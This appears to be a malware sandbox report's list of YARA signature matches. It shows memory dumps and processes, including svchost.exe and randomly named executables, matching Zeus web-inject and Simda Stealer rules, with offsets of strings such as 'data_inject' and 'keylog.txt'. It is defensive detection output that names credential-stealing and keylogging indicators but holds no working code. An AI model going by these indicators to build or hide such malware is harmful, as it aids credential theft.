00000002.00000003.2642540091.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000002.3391439892.00000000029A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48bf4:$a1: name=%s&port=%u 0x483c8:$a2: data_inject 0x4857c:$a3: keylog.txt 0x4825d:$a4: User-agent: %s]]] 0x48d44:$a5: %s\%02d.bmp
0000001C.00000002.2632299607.0000000002D10000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48bf4:$a1: name=%s&port=%u 0x483c8:$a2: data_inject 0x4857c:$a3: keylog.txt 0x4825d:$a4: User-agent: %s]]] 0x48d44:$a5: %s\%02d.bmp
00000002.00000003.2683452927.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000014.00000002.2583716021.0000000002650000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48bf4:$a1: name=%s&port=%u 0x483c8:$a2: data_inject 0x4857c:$a3: keylog.txt 0x4825d:$a4: User-agent: %s]]] 0x48d44:$a5: %s\%02d.bmp
00000002.00000003.2682237093.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2591770836.0000000005450000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2646105043.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000019.00000002.2643934604.0000000002F50000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47df4:$a1: name=%s&port=%u 0x475c8:$a2: data_inject 0x4777c:$a3: keylog.txt 0x4745d:$a4: User-agent: %s]]] 0x47f44:$a5: %s\%02d.bmp
00000002.00000003.2634522992.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2681497968.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2488750222.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2634738816.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2710792546.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000002.3391439892.00000000029F3000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x477f4:$a1: name=%s&port=%u 0x46fc8:$a2: data_inject 0x4717c:$a3: keylog.txt 0x46e5d:$a4: User-agent: %s]]] 0x47944:$a5: %s\%02d.bmp
00000002.00000003.2643292305.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2681300847.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2509383327.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2681891778.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2683874460.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2504620207.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000022.00000002.2695460193.0000000000BD0000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48bf4:$a1: name=%s&port=%u 0x483c8:$a2: data_inject 0x4857c:$a3: keylog.txt 0x4825d:$a4: User-agent: %s]]] 0x48d44:$a5: %s\%02d.bmp
00000002.00000003.2636504789.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2680873224.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2684684807.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2643045244.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
0000000A.00000002.2575020460.00000000014C0000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48bf4:$a1: name=%s&port=%u 0x483c8:$a2: data_inject 0x4857c:$a3: keylog.txt 0x4825d:$a4: User-agent: %s]]] 0x48d44:$a5: %s\%02d.bmp
00000024.00000002.2645314223.00000000023A0000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47df4:$a1: name=%s&port=%u 0x475c8:$a2: data_inject 0x4777c:$a3: keylog.txt 0x4745d:$a4: User-agent: %s]]] 0x47f44:$a5: %s\%02d.bmp
00000002.00000003.2642865814.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4dbf4:$a1: name=%s&port=%u 0x4d3c8:$a2: data_inject 0x4d57c:$a3: keylog.txt 0x4d25d:$a4: User-agent: %s]]] 0x4dd44:$a5: %s\%02d.bmp
00000002.00000003.2562478885.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2684438036.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000024.00000002.2645122457.0000000002200000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48bf4:$a1: name=%s&port=%u 0x483c8:$a2: data_inject 0x4857c:$a3: keylog.txt 0x4825d:$a4: User-agent: %s]]] 0x48d44:$a5: %s\%02d.bmp
00000002.00000003.2712266421.000000000EE00000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2671268394.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2684242011.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2650052400.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2689405360.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2643706755.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2682432522.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2522638686.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2136596251.0000000000881000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
00000002.00000003.2136596251.0000000000881000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4c7f4:$a1: name=%s&port=%u 0x4bfc8:$a2: data_inject 0x4c17c:$a3: keylog.txt 0x4be5d:$a4: User-agent: %s]]] 0x4c944:$a5: %s\%02d.bmp
00000002.00000003.2695314934.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2666567712.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2711233354.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47df4:$a1: name=%s&port=%u 0x475c8:$a2: data_inject 0x4777c:$a3: keylog.txt 0x4745d:$a4: User-agent: %s]]] 0x47f44:$a5: %s\%02d.bmp
00000002.00000003.2649020462.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2670333858.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2638992211.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2682624187.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
0000000E.00000002.2560722712.0000000002AC0000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47df4:$a1: name=%s&port=%u 0x475c8:$a2: data_inject 0x4777c:$a3: keylog.txt 0x4745d:$a4: User-agent: %s]]] 0x47f44:$a5: %s\%02d.bmp
00000002.00000003.2683674807.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
0000001C.00000002.2632514116.0000000002EB0000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47df4:$a1: name=%s&port=%u 0x475c8:$a2: data_inject 0x4777c:$a3: keylog.txt 0x4745d:$a4: User-agent: %s]]] 0x47f44:$a5: %s\%02d.bmp
Process Memory Space: Bpfz752pYZ.exe PID: 1596	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
Process Memory Space: Bpfz752pYZ.exe PID: 1596	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x2a85c:$a1: name=%s&port=%u 0x61168:$a1: name=%s&port=%u 0x29825:$a2: data_inject 0x60131:$a2: data_inject 0x29d72:$a3: keylog.txt 0x6067e:$a3: keylog.txt 0x296f4:$a4: User-agent: %s]]] 0x60000:$a4: User-agent: %s]]] 0x2a960:$a5: %s\%02d.bmp 0x6126c:$a5: %s\%02d.bmp
Process Memory Space: svchost.exe PID: 4888	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
Process Memory Space: svchost.exe PID: 4888	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x3d822:$a1: name=%s&port=%u 0x8c925:$a1: name=%s&port=%u 0xff32d:$a1: name=%s&port=%u 0x20c8ef:$a1: name=%s&port=%u 0x32564e:$a1: name=%s&port=%u 0x37c986:$a1: name=%s&port=%u 0x5282a8:$a1: name=%s&port=%u 0x3c7e0:$a2: data_inject 0x8b8ee:$a2: data_inject 0xfe2f6:$a2: data_inject 0x20b8ad:$a2: data_inject 0x32460c:$a2: data_inject 0x37b944:$a2: data_inject 0x527266:$a2: data_inject 0x3cd2d:$a3: keylog.txt 0x8be3b:$a3: keylog.txt 0xfe843:$a3: keylog.txt 0x20bdfa:$a3: keylog.txt 0x324b59:$a3: keylog.txt 0x37be91:$a3: keylog.txt 0x5277b3:$a3: keylog.txt
Process Memory Space: NcYLgtXIKJgHj.exe PID: 1656	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x3899:$a1: name=%s&port=%u 0x2a556:$a1: name=%s&port=%u 0x2857:$a2: data_inject 0x29514:$a2: data_inject 0x2da4:$a3: keylog.txt 0x29a61:$a3: keylog.txt 0x2726:$a4: User-agent: %s]]] 0x293e3:$a4: User-agent: %s]]] 0x399d:$a5: %s\%02d.bmp 0x2a65a:$a5: %s\%02d.bmp
Process Memory Space: NcYLgtXIKJgHj.exe PID: 3000	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49bc:$a1: name=%s&port=%u 0x1a3bd:$a1: name=%s&port=%u 0x397a:$a2: data_inject 0x1937b:$a2: data_inject 0x3ec7:$a3: keylog.txt 0x198c8:$a3: keylog.txt 0x3849:$a4: User-agent: %s]]] 0x1924a:$a4: User-agent: %s]]] 0x4ac0:$a5: %s\%02d.bmp 0x1a4c1:$a5: %s\%02d.bmp
Process Memory Space: NcYLgtXIKJgHj.exe PID: 616	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x8c4f:$a1: name=%s&port=%u 0x1c1b2:$a1: name=%s&port=%u 0x7c0d:$a2: data_inject 0x1b170:$a2: data_inject 0x815a:$a3: keylog.txt 0x1b6bd:$a3: keylog.txt 0x7adc:$a4: User-agent: %s]]] 0x1b03f:$a4: User-agent: %s]]] 0x8d53:$a5: %s\%02d.bmp 0x1c2b6:$a5: %s\%02d.bmp
Process Memory Space: NcYLgtXIKJgHj.exe PID: 3704	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x10dc8:$a1: name=%s&port=%u 0x220ca:$a1: name=%s&port=%u 0xfd86:$a2: data_inject 0x21088:$a2: data_inject 0x102d3:$a3: keylog.txt 0x215d5:$a3: keylog.txt 0xfc55:$a4: User-agent: %s]]] 0x20f57:$a4: User-agent: %s]]] 0x10ecc:$a5: %s\%02d.bmp 0x221ce:$a5: %s\%02d.bmp
Process Memory Space: NcYLgtXIKJgHj.exe PID: 4828	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x10344:$a1: name=%s&port=%u 0x16e3d:$a1: name=%s&port=%u 0xf302:$a2: data_inject 0x15dfb:$a2: data_inject 0xf84f:$a3: keylog.txt 0x16348:$a3: keylog.txt 0xf1d1:$a4: User-agent: %s]]] 0x15cca:$a4: User-agent: %s]]] 0x10448:$a5: %s\%02d.bmp 0x16f41:$a5: %s\%02d.bmp
Process Memory Space: NcYLgtXIKJgHj.exe PID: 5576	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0xc33d:$a1: name=%s&port=%u 0x1b95e:$a1: name=%s&port=%u 0xb2fb:$a2: data_inject 0x1a91c:$a2: data_inject 0xb848:$a3: keylog.txt 0x1ae69:$a3: keylog.txt 0xb1ca:$a4: User-agent: %s]]] 0x1a7eb:$a4: User-agent: %s]]] 0xc441:$a5: %s\%02d.bmp 0x1ba62:$a5: %s\%02d.bmp
Process Memory Space: NcYLgtXIKJgHj.exe PID: 4180	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x115ec:$a1: name=%s&port=%u 0x24d22:$a1: name=%s&port=%u 0x105aa:$a2: data_inject 0x23ce0:$a2: data_inject 0x10af7:$a3: keylog.txt 0x2422d:$a3: keylog.txt 0x10479:$a4: User-agent: %s]]] 0x23baf:$a4: User-agent: %s]]] 0x116f0:$a5: %s\%02d.bmp 0x24e26:$a5: %s\%02d.bmp
Process Memory Space: NcYLgtXIKJgHj.exe PID: 5376	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0xef35:$a1: name=%s&port=%u 0x1a6ff:$a1: name=%s&port=%u 0xdef3:$a2: data_inject 0x196bd:$a2: data_inject 0xe440:$a3: keylog.txt 0x19c0a:$a3: keylog.txt 0xddc2:$a4: User-agent: %s]]] 0x1958c:$a4: User-agent: %s]]] 0xf039:$a5: %s\%02d.bmp 0x1a803:$a5: %s\%02d.bmp
Process Memory Space: NcYLgtXIKJgHj.exe PID: 4836	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x124dc:$a1: name=%s&port=%u 0x21947:$a1: name=%s&port=%u 0x1149a:$a2: data_inject 0x20905:$a2: data_inject 0x119e7:$a3: keylog.txt 0x20e52:$a3: keylog.txt 0x11369:$a4: User-agent: %s]]] 0x207d4:$a4: User-agent: %s]]] 0x125e0:$a5: %s\%02d.bmp 0x21a4b:$a5: %s\%02d.bmp
Process Memory Space: NcYLgtXIKJgHj.exe PID: 936	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0xa123:$a1: name=%s&port=%u 0x15e68:$a1: name=%s&port=%u 0x90e1:$a2: data_inject 0x14e26:$a2: data_inject 0x962e:$a3: keylog.txt 0x15373:$a3: keylog.txt 0x8fb0:$a4: User-agent: %s]]] 0x14cf5:$a4: User-agent: %s]]] 0xa227:$a5: %s\%02d.bmp 0x15f6c:$a5: %s\%02d.bmp
Process Memory Space: NcYLgtXIKJgHj.exe PID: 5720	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0xc3f1:$a1: name=%s&port=%u 0x16d47:$a1: name=%s&port=%u 0xb3af:$a2: data_inject 0x15d05:$a2: data_inject 0xb8fc:$a3: keylog.txt 0x16252:$a3: keylog.txt 0xb27e:$a4: User-agent: %s]]] 0x15bd4:$a4: User-agent: %s]]] 0xc4f5:$a5: %s\%02d.bmp 0x16e4b:$a5: %s\%02d.bmp
